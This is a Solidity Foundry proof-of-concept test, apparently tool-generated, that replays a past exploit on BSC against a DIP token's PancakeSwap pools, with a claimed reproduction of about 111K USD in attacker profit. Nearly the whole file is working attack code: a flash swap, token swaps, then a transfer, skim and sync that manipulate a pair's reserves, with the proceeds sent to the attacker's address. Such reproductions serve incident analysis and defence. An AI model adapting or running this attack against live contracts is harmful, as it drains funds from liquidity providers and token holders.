// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;

import {Test, console2} from "forge-std/Test.sol";
import {LumosPoCBase} from "./LumosPoCBase.sol";

// @KeyInfo - Total Lost : N/A
// Attacker : 0x0d4024cd27538350a911d9b7ee90811fa4875ba3
// Attack Contract : 0xddef10a85a5c67a9af8398d297aa51f8716383c7
// Vulnerable Contract : 0x6c60bf5db0670ae94489d3dde2c60f271625db50
// Attack Tx : 0x1c09395848a87069c9d6ddbe5adc6249510aba7a2a83479a74b4280cafb5fb29
// Block : 104598279
// Chain : BSC
// Analysis :
//
// @Reproduction
// Verdict : pass
// Economic Proof : attacker_profit_reproduction
// Reproduced Value : 111.06K USD
//
// @POC Author
// Generated by LumosKit

contract AttackTest is LumosPoCBase {
    address constant ATTACKER_EOA = LumosAddresses.attacker_eoa;
    address constant ATTACK_CONTRACT = LumosAddresses.ContractTest;
    uint256 constant FORK_BLOCK = 104598278;
    uint256 constant TX_TIMESTAMP = 1781627318;
    uint256 constant TX_BLOCK_NUMBER = 104598279;
    uint256 constant TX_VALUE = 0;

    function setUp() public {
        vm.createSelectFork(vm.envString("LUMOSKIT_FORK_ENDPOINT"));
        if (TX_TIMESTAMP != 0) vm.warp(TX_TIMESTAMP);
        if (TX_BLOCK_NUMBER != 0) vm.roll(TX_BLOCK_NUMBER);
    }

    function testPoC() public {
        _runExploit();
    }

    function _runExploit() internal {
        vm.startPrank(ATTACKER_EOA, ATTACKER_EOA);
        OurAttack attack;
        if (ATTACK_CONTRACT != address(0)) {
            _installRuntime();
            attack = OurAttack(payable(ATTACK_CONTRACT));
        } else {
            attack = new OurAttack();
        }
        _expectOutcome(address(attack), address(0));
        _snapProfit();
        _logBalances("Before exploit");
        attack.attack{value: TX_VALUE}();
        _logBalances("After exploit");
        vm.stopPrank();
        _assertProfit();
    }

    function _installRuntime() internal {
        vm.etch(ATTACK_CONTRACT, type(OurAttack).runtimeCode);
    }

    function _expectOutcome(address attack, address helper) internal {
        attack;
        helper;
        _expectProfit(LumosAddresses.attacker_eoa, address(0), LumosAddresses.USDC, "USDC", 111097596667856001191208);
    }
}

contract OurAttack {
    function attack() external payable {
        _attack();
    }

    function _attack() internal {
        IUniswapV2PairLike(LumosAddresses.Cake_LP_CAE1).swap(19000000000000000000000000, 0, address(this), hex"00");
        uint256 aicBalanceOfContractTest = IERC20Like(LumosAddresses.AIC).balanceOf(address(this));
        uint256 approveActionGraphAllowance = 9977659001700876485419035;
        IERC20Like(LumosAddresses.AIC).approve(LumosAddresses.PancakeRouter, approveActionGraphAllowance);
        {
            uint256 swapAmountIn = 9977659001700876485419035; // replay guard: router pulls tokenIn from address(this), so cap raw observed spend to the live replay balance
            uint256 swapAmountInAvailable = IERC20Like(LumosAddresses.AIC).balanceOf(address(this));
            if (swapAmountIn > swapAmountInAvailable) swapAmountIn = swapAmountInAvailable;
            if (swapAmountIn != 0) {
                if (
                    IERC20Like(LumosAddresses.AIC).allowance(address(this), LumosAddresses.PancakeRouter) < swapAmountIn
                ) {
                    IERC20Like(LumosAddresses.AIC).approve(LumosAddresses.PancakeRouter, type(uint256).max);
                }
                IPancakeRouter(LumosAddresses.PancakeRouter)
                    .swapExactTokensForTokensSupportingFeeOnTransferTokens(
                        swapAmountIn,
                        0,
                        _addressArray2(LumosAddresses.AIC, LumosAddresses.USDC),
                        LumosAddresses.attacker_eoa,
                        1781627318
                    );
            }
        }
    }

    function _callback() internal {
        _markCallback(1);
        IERC20Like(LumosAddresses.AIC).balanceOf(address(this));
        uint256 aicApproveAllowance = type(uint256).max; // value provenance: arg1=type(uint256).max is covered by prior LumosAddresses.AIC.balanceOf(address) return=19000000000000000000000000 with args (address(this))
        IERC20Like(LumosAddresses.AIC).approve(LumosAddresses.PancakeRouter, aicApproveAllowance);
        {
            uint256 swapAmountIn = 19000000000000000000000000; // replay guard: router pulls tokenIn from address(this), so cap raw observed spend to the live replay balance
            uint256 swapAmountInAvailable = IERC20Like(LumosAddresses.AIC).balanceOf(address(this));
            if (swapAmountIn > swapAmountInAvailable) swapAmountIn = swapAmountInAvailable;
            if (swapAmountIn != 0) {
                if (
                    IERC20Like(LumosAddresses.AIC).allowance(address(this), LumosAddresses.PancakeRouter) < swapAmountIn
                ) {
                    IERC20Like(LumosAddresses.AIC).approve(LumosAddresses.PancakeRouter, type(uint256).max);
                }
                IPancakeRouter(LumosAddresses.PancakeRouter)
                    .swapExactTokensForTokensSupportingFeeOnTransferTokens(
                        swapAmountIn,
                        0,
                        _addressArray2(LumosAddresses.AIC, LumosAddresses.DIP),
                        address(this),
                        1781627318
                    );
            }
        }
        IERC20Like(LumosAddresses.DIP).balanceOf(LumosAddresses.Cake_LP_19EF);
        IERC20Like(LumosAddresses.DIP).transfer(LumosAddresses.Cake_LP_19EF, 9896547403069763107963336);
        ICake_LP_19EF(LumosAddresses.Cake_LP_19EF).skim(LumosAddresses.PancakeRouter);
        ICake_LP_19EF(LumosAddresses.Cake_LP_19EF).sync();
        IERC20Like(LumosAddresses.DIP).balanceOf(address(this));
        uint256 dipApproveAllowance = type(uint256).max; // value provenance: arg1=type(uint256).max is covered by prior LumosAddresses.DIP.balanceOf(address) return=7668350522572379381125998 with args (address(this))
        IERC20Like(LumosAddresses.DIP).approve(LumosAddresses.PancakeRouter, dipApproveAllowance);
        {
            uint256 swapAmountIn = 7668350522572379381125998; // replay guard: router pulls tokenIn from address(this), so cap raw observed spend to the live replay balance
            uint256 swapAmountInAvailable = IERC20Like(LumosAddresses.DIP).balanceOf(address(this));
            if (swapAmountIn > swapAmountInAvailable) swapAmountIn = swapAmountInAvailable;
            if (swapAmountIn != 0) {
                if (
                    IERC20Like(LumosAddresses.DIP).allowance(address(this), LumosAddresses.PancakeRouter) < swapAmountIn
                ) {
                    IERC20Like(LumosAddresses.DIP).approve(LumosAddresses.PancakeRouter, type(uint256).max);
                }
                IPancakeRouter(LumosAddresses.PancakeRouter)
                    .swapExactTokensForTokensSupportingFeeOnTransferTokens(
                        swapAmountIn,
                        0,
                        _addressArray2(LumosAddresses.DIP, LumosAddresses.AIC),
                        address(this),
                        1781627318
                    );
            }
        }
        IERC20Like(LumosAddresses.AIC).transfer(LumosAddresses.Cake_LP_CAE1, 19060000000000000000000000);
    }

    receive() external payable {}

    function test(address arg0, address arg1, address arg2, address arg3) external payable {
        arg0;
        arg1;
        arg2;
        arg3;
        _attack();
        return;
    }

    function pancakeCall(address arg0, uint256 amount, uint256 amount1, bytes calldata arg3) external payable {
        arg0;
        amount;
        amount1;
        arg3;
        if (!_callbackSeen(1)) _callback();
        return;
    }

    fallback() external payable {
        _entryCb();
    }

    function _entryCb() internal {}

    mapping(uint256 => bool) private _lumosCallbackSeenFlag;
    mapping(uint256 => uint256) private _lumosEntryCallbackCursor;
    mapping(address => uint256) private _lumosBalancerVaultPreBalance;

    function _callbackSeen(uint256 index) internal view returns (bool) {
        return _lumosCallbackSeenFlag[index];
    }

    function _nextEntryCb(uint256 index) internal returns (uint256 ordinal) {
        ordinal = _lumosEntryCallbackCursor[index];
        _lumosEntryCallbackCursor[index] = ordinal + 1;
    }

    function _markCallback(uint256 index) internal {
        _lumosCallbackSeenFlag[index] = true;
    }

    function _recordBalancerPre(address[] memory tokens) internal {
        for (uint256 i = 0; i < tokens.length; i++) {
            _lumosBalancerVaultPreBalance[tokens[i]] =
                IERC20Like(tokens[i]).balanceOf(0xBA12222222228d8Ba445958a75a0704d566BF2C8);
        }
    }

    function lumosRecordBalancerPre(address[] memory tokens) external {
        _recordBalancerPre(tokens);
    }

    function lumosBalancerVaultPreBalance(address token) external view returns (uint256) {
        return _lumosBalancerVaultPreBalance[token];
    }

    function _addressArray2(address a0, address a1) internal pure returns (address[] memory out) {
        out = new address[](2);
        out[0] = a0;
        out[1] = a1;
    }
}

interface IERC20Like {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external;
    function transfer(address to, uint256 amount) external;
    function transferFrom(address from, address to, uint256 amount) external;
}

interface ILumosWETHLike {
    function deposit() external payable;
}

interface IERC721Like {
    function ownerOf(uint256 tokenId) external view returns (address);
    function getApproved(uint256 tokenId) external view returns (address);
    function isApprovedForAll(address owner, address operator) external view returns (bool);
    function transferFrom(address from, address to, uint256 tokenId) external;
    function safeTransferFrom(address from, address to, uint256 tokenId) external;
}

interface ILumosUniswapV2PairLike {
    function mint(address to) external returns (uint256 liquidity);
    function burn(address to) external returns (uint256 amount0, uint256 amount1);
    function skim(address to) external;
    function sync() external;
    function swap(uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data) external;
}

interface IMulticallLike {
    function multicall(bytes[] calldata data) external returns (bytes[] memory results);
}

struct LumosObservedCall {
    address target;
    bytes data;
}

library LumosAddresses {
    address internal constant ZERO = address(0);
    address internal constant attacker_eoa = 0x0d4024Cd27538350a911D9B7eE90811fa4875ba3; // LumosAddresses.attacker_eoa = 0x0d4024cd27538350a911d9b7ee90811fa4875ba3 label=attacker_eoa roles=attacker_eoa|contract|economic_holder|observed_address|profit_holder|recipient|sender source=tx_metadata.from confidence=high
    address internal constant PancakeRouter = 0x10ED43C718714eb63d5aA57B78B54704E256024E; // LumosAddresses.PancakeRouter = 0x10ed43c718714eb63d5aa57b78b54704e256024e label=PancakeRouter roles=observed_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant Cake_LP = 0x473715a3AD10E6ea8E8d549CC0C0B1059B2bA9bd; // LumosAddresses.Cake_LP = 0x473715a3ad10e6ea8e8d549cc0c0b1059b2ba9bd label=PancakePair token_symbol=Cake-LP roles=asset|contract|observed_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant A_4D202D_5359 = 0x4D202ddD3d7960e99D3d457caE7eBfEa04D45359; // LumosAddresses.A_4D202D_5359 = 0x4d202ddd3d7960e99d3d457cae7ebfea04d45359 label=unresolved roles=observed_address|recipient source=unresolved confidence=low
    address internal constant AIC = 0x524c72268E2053bB356Ecb4C1364B5BB74644405; // LumosAddresses.AIC = 0x524c72268e2053bb356ecb4c1364b5bb74644405 label=AIC token_symbol=AIC roles=asset|contract|observed_address|recipient|token_related source=etherscan_v2 confidence=high
    address internal constant DIP = 0x6C60bf5DB0670ae94489d3DdE2c60f271625dB50; // LumosAddresses.DIP = 0x6c60bf5db0670ae94489d3dde2c60f271625db50 label=DIP token_symbol=DIP roles=asset|contract|observed_address|recipient|token_related source=etherscan_v2 confidence=high
    address internal constant USDC = 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d; // LumosAddresses.USDC = 0x8ac76a51cc950d9822d68b83fe1ad97b32cd580d label=BEP20UpgradeableProxy token_symbol=USDC roles=asset|contract|economic_asset|observed_address|profit_asset|recipient|storage_contract|token_related source=etherscan_v2 confidence=high
    address internal constant BalancerVault = 0xBA12222222228d8Ba445958a75a0704d566BF2C8; // LumosAddresses.BalancerVault = 0xba12222222228d8ba445958a75a0704d566bf2c8 label=BalancerVault roles=known_protocol source=poc_sketch.known_addresses confidence=high
    address internal constant USDC_0B5C = 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C; // LumosAddresses.USDC_0B5C = 0xba5fe23f8a3a24bed3236f05f2fcf35fd0bf0b5c label=unresolved token_symbol=USDC roles=asset|contract|observed_address|recipient source=unresolved confidence=low
    address internal constant ContractTest = 0xddeF10A85A5c67A9aF8398D297aa51f8716383c7; // address(this) = 0xddef10a85a5c67a9af8398d297aa51f8716383c7 label=ContractTest roles=asset|attacker_callback_contract|attacker_contract|attacker_entry_contract|code_contract|contract|localized_contract|observed_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant NEX = 0xE75B76F2cE02521fD4615fF861c9B6809771C28a; // LumosAddresses.NEX = 0xe75b76f2ce02521fd4615ff861c9b6809771c28a label=unresolved token_symbol=NEX roles=asset|contract|observed_address|recipient source=unresolved confidence=low
    address internal constant Cake_LP_19EF = 0xF7D8267D01D1104Da2Dd30828aA9C0E1647919ef; // LumosAddresses.Cake_LP_19EF = 0xf7d8267d01d1104da2dd30828aa9c0e1647919ef label=unresolved token_symbol=Cake-LP roles=asset|contract|observed_address|recipient|sender|storage_contract source=unresolved confidence=low
    address internal constant Cake_LP_CAE1 = 0xF8331a897C5F32B57EAb394af8ADF0D00003CAE1; // LumosAddresses.Cake_LP_CAE1 = 0xf8331a897c5f32b57eab394af8adf0d00003cae1 label=PancakePair token_symbol=Cake-LP roles=asset|contract|observed_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
}

interface ICake_LP_19EF {
    function skim(address) external;
    function sync() external;
}

interface IPancakeRouter {
    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256,
        uint256,
        address[] calldata,
        address,
        uint256
    ) external;
}

interface IUniswapV2PairLike {
    function swap(uint256, uint256, address, bytes calldata) external;
}
